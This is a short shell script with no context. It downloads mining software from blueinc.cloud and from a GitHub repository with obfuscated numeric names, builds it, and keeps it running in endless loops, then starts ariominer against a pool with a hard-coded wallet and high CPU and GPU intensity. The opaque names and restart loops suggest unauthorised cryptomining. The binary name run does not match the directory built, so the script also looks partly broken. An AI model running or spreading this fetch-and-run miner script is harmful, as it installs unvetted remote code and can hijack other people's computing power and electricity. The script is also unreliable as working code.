wget -N http://www.blueinc.cloud/nanominer.tar.xz

tar -xvf ./nanominer.tar.xz

cd ./nanominer/

while true
do

./nanominer

done

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linuxweb844444748874.tar.xz
tar -xvf ./linuxweb844444748874.tar.xz
cd ./linuxweb844444748874/
mkdir linux84748874
cd linux84748874
cmake ..
make

while true
do

./linux848888888874 linux8474

done

./ariominer --mode miner --pool http://www.blueinc.cloud --wallet 3VnCmWyLQb8f1XhkQv4fiB1CrGewityDDteNtQwhMu3DjBuaDmUWbPMkPnbSaJPcbGrrJi1zkCHDXd4fGtTUeej3 --name linux8474 --cpu-intensity 82 --gpu-intensity-cblocks 98 --gpu-intensity-gblocks 98
